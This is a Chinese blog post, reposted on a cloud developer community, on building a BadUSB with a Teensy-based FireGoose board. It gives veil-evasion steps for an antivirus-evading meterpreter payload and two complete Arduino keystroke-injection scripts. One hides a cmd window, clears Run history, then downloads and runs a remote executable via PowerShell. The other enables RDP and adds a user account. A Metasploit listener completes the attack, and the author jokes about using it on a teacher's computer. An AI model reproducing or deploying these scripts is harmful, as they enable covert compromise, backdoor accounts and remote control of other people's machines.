AI 助理
备案控制台
开发者社区 云计算 文章 正文

利用烧鹅制作简单BadUSB,插谁谁怀孕

2017-11-14 1150
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

所用硬件设备为烧鹅,烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板。 
使用veil编码meterpreter生成payload(经过编码的payload在杀软中仅能够存活几分钟),放到服务器上。插入烧鹅,模拟键盘输入,在cmd中下载payload,并执行。 

Github:https://github.com/RadioWar/FireGoose

0x1 利用veil编码打造免杀的meterpreter 

root@kali:~# veil-evasion          //启动veil 
[>] Please enter a command: list    //查看可选列表 
26) python/meterpreter/rev_tcp 

[>] Please enter a command: 26     //这里选择编号为26的payload 
[>] Please enter a command: set LHOST 192.168.31.233  //设置LHOST 

 

[>] Please enter a command: generate             //对payload进行编码 
[*] Press [enter] for 'payload' 
[>] Please enter the base name for output files: a   //输入生成的payload名字 
[>] Please enter the number of your choice: 1 //选择编码方式 

[*] Executable written to: /root/veil-output/compiled/a1.exe  //生成经过编码的payload位置 

0x2 将执行代码写入badusb中 

使用Arduino IDE 写入,其中下载使用的是PowerShell,如果使用vbs那种方法,360会报警

 

复制代码 
 1 void setup() {               //初始化,这里的代码只执行一次 
 2 delay(5000);                //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。 
 3 Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);                // 按下Win键 
 4 Keyboard.set_key1(KEY_R);                                   // 同时按下R键 
 5 Keyboard.send_now();                                       // 发送Win+R 
 6 delay(100);    
 7 Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");  
 8 //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的 
 9 Keyboard.set_key1(KEY_ENTER); 
10 Keyboard.send_now(); 
11 delay(300); 
12 Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");                                           //利用注册表清除开始--运行的记录 
13 Keyboard.set_key1(KEY_ENTER); 
14 Keyboard.send_now();  
15 Keyboard.println("powershell (new- object System.Net.WebClient).DownloadFile('http://192.168.1.100 /a1.exe','D:\\1.exe')");                              //下载远程的payload 
16 Keyboard.set_key1(KEY_ENTER);                                  
17 Keyboard.send_now();                                        
18 Keyboard.set_modifier(0); 
19 Keyboard.set_key1(0);    
20 Keyboard.send_now();   
21 delay(3000);                                               //设置延迟,等待下载完成 
22 Keyboard.println("d:\\1.exe");                            //执行打开命令 
23 Keyboard.set_key1(KEY_ENTER); 
24 delay(300);    
25 Keyboard.set_modifier(0); 
26 Keyboard.set_key1(0); 
27 Keyboard.set_modifier(MODIFIERKEY_ALT); 
28 Keyboard.set_key1(KEY_SPACE); 
29 Keyboard.set_key2(KEY_C); 
30 Keyboard.send_now();  
31 Keyboard.set_modifier(0); 
32 Keyboard.set_key1(0); 
33 Keyboard.set_key2(0); 
34 Keyboard.send_now();                                       //关闭cmd窗口 
35     } 
36    void loop()                                           //循环,这里的代码无限循环 
37     { 
38     }
复制代码

对于win7开启3389,并加帐户,使用

复制代码 
 1 void setup() {                                                 //初始化,这里的代码只执行一次
 2    delay(5000);                     //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。
 3    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);                  // 按下Win键
 4    Keyboard.set_key1(KEY_R);                                      // 同时按下R键
 5    Keyboard.send_now();                                           // 发送Win+R
 6    delay(100);   
 7    Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); 
 8 //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的
 9    Keyboard.set_key1(KEY_ENTER);
10    Keyboard.send_now();
11    delay(300);
12    Keyboard.println("REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");  //开启3389
13    Keyboard.set_key1(KEY_ENTER);                                 
14    Keyboard.send_now();
15    Keyboard.println("net user 123 123 /add");        //添加帐户
16    Keyboard.set_modifier(0);
17    Keyboard.set_key1(0);   
18    Keyboard.send_now();  
19    delay(500);   
20    Keyboard.set_modifier(0);
21    Keyboard.set_key1(0);
22    Keyboard.set_modifier(MODIFIERKEY_ALT);
23    Keyboard.set_key1(KEY_SPACE);
24    Keyboard.set_key2(KEY_C);
25    Keyboard.send_now(); 
26    Keyboard.set_modifier(0);
27    Keyboard.set_key1(0);
28    Keyboard.set_key2(0);
29    Keyboard.send_now();          //关闭cmd
30     }
31    void loop()                                                    //循环,这里的代码无限循环
32     {
33     }
复制代码

在学校中利用3389比meterpreter更加好用。开启3389,杀软不会提示。添加帐户,360会提示,电脑管家不会提示。

对于执行修改dns等一些需要输入中文的地方,就比较麻烦了,暂时还没想到好的方法,只想到模拟键盘输入 Shift + Ctrl开启输入法....利用条件比较苛刻

0x3  等待目标连接 

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E  //开始监听,等待连接 

将USB插入目标机器,执行相关命令 
目标机器上线 

 

PS:玩法还有很多,还可以开启目标机器3389,新建用户等等,快要期末考试了,不要拦着我,我要去插下老师的机器......

 

本文转自 K1two2 博客园博客,原文链接:http://www.cnblogs.com/k1two2/p/4538617.html   ,如需转载请自行联系原作者
技术小牛人
目录
相关文章
黑客花无涯
|
安全 算法 区块链
花无涯带你走进黑客世界之Tor洋葱网络
Tor本来是为用户提供匿名上网保护用户隐私的工具,但是对于一些用户来说,他们可以利用Tor的隐蔽性进行黑客攻击或非法交易活动。总结Tor的恶意应用主要表现在以下几方面。
黑客花无涯
576 0
游客eg2mpb57glrj6
|
边缘计算 JSON 物联网
解锁业务灵活性:RuleGo规则引擎的高效解耦与实时响应秘籍
RuleGo是一个基于Go语言的轻量级、高性能规则引擎,旨在通过动态规则链和组件化设计,简化复杂系统的业务逻辑管理和实时响应。
游客eg2mpb57glrj6
686 1
解锁业务灵活性:RuleGo规则引擎的高效解耦与实时响应秘籍
狼人2007
|
虚拟化 Windows
Windows 7 / Windows Server 2008 R2 完美激活工具 Windows Loader 2.1.7
Windows 7 / Windows Server 2008 R2 完美激活工具 Windows Loader 2.1.7   Windows Loader 激活原理:预装OEM版Windows 7的品牌电脑是这样激活 Windows 7的:三个条件:1、BIOS mod 存在可激活系统的SLIC2.1;2、key;3、证书。
狼人2007
21342 0
亚里士多智
|
存储 开发工具 Docker
Docker数据目录迁移解决方案
在docker的使用中随着下载镜像越来越多,构建镜像、运行容器越来越多, 数据目录必然会逐渐增大;当所有docker镜像、容器对磁盘的使用达到上限时,就需要对数据目录进行迁移。
亚里士多智
12858 1
流淌的琴声
|
2月前
|
敏捷开发 人工智能 监控
任务反馈闭环管理:打造高效执行力的17个关键环节全解析
任务反馈闭环管理是一种确保任务从布置到完成全过程信息透明的管理方法,其核心是通过"计划-执行-反馈-改进"的完整循环,解决传统管理中常见的"任务黑洞"问题。这种机制强调责任明确、流程标准化、反馈及时和持续优化,能够显著提升执行力、团队协同效率和组织的敏捷性。关键环节包括SMART目标设定、标准化执行流程、量化反馈机制和PDCA持续改进。有效的闭环管理需要制度设计、工具支持和流程优化的协同配合,并通过五大KPI(任务完成率、反馈及时率等)进行量化评估。实施闭环管理虽面临员工适应、流程复杂等挑战,但数字化转型和智能化工具的应用正推动其向更高效的方向发展。闭环管理不仅是提升效率的工具,更是促进组织持
流淌的琴声
263 0
OpenIM
|
5月前
|
JavaScript 前端开发 Go
Wasm Client SDK 架构介绍
Wasm Client SDK 架构介绍
OpenIM
188 13
小Lee
|
存储 编解码 算法
ans介绍学习
【9月更文挑战第5天】
小Lee
972 13
游客iigf2m33ba53k
|
传感器 机器学习/深度学习 人工智能
多传感器融合 | CenterFusion:毫米波雷达和相机后融合3D检测算法
本文主要介绍一种基于毫米波雷达和相机后融合的3D目标检测算法——CenterFusion,原本是公司内部的一个技术方案,截取了其中的核心理论部分,所以看起来肯能有些严肃。
游客iigf2m33ba53k
2723 0
多传感器融合 | CenterFusion:毫米波雷达和相机后融合3D检测算法
老陈聊架构
|
数据安全/隐私保护 Docker 容器
『MinIO』在Docker中快速部署MinIO
📣读完这篇文章里你能收获到 - 在Docker中快速部署MinIO
老陈聊架构
7140 5
『MinIO』在Docker中快速部署MinIO

热门文章

最新文章

  • 1
    互联网大厂程序员岗位职级划分
  • 2
    【资料合集】红包在线技术峰会回顾集锦:讲义PDF+活动视频!
  • 3
    那些年,人们问王坚博士的33个问题
  • 4
    世界互联网大会发布15项领先科技成果
  • 5
    GNU make manual 翻译(十五)
  • 6
    SSRS 2012 聚合函数 -- 介绍
  • 7
    微软将停止免费提供15GB OneDrive空间
  • 8
    Node.js开发者必须熟悉的四个JavaScript概念
  • 9
    Harp – 内置常用预处理器的静态 Web 服务器
  • 10
    Sql Server内置函数实现MD5加密
  • 1
    基于C#实现的支持文件传输的Socket聊天室
    73
  • 2
    Gateway 网关坑我! 被这个404 问题折腾了一年?
    110
  • 3
    Service Mesh:原则、挑战和演变
    48
  • 4
    DDD领域驱动设计:实践中的聚合
    57
  • 5
    【详细教程】如何在Ubuntu上本地部署Dify?
    55
  • 6
    Dapr:用于构建分布式应用程序的便携式事件驱动运行时
    47
  • 7
    阿里云gpu云服务器收费价格,热门实例简介和最新按量、1个月、1年收费标准参考
    100
  • 8
    游戏显卡驱动,NVIDIA App ,0xc000007b,amd显卡驱动下载,解决游戏慢,游戏卡等问题
    65
  • 9
    基于python大数据的天气可视化分析预测系统
    66
  • 10
    AIRS/Aqua L1B 可见光/近红外 (VIS/NIR) 地理定位和校准辐射 V005 (AIRVBRAD) 在 GES DISC
    58

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    蛋白质语言模型 ProGen:在实验室合成由 AI 预测的蛋白质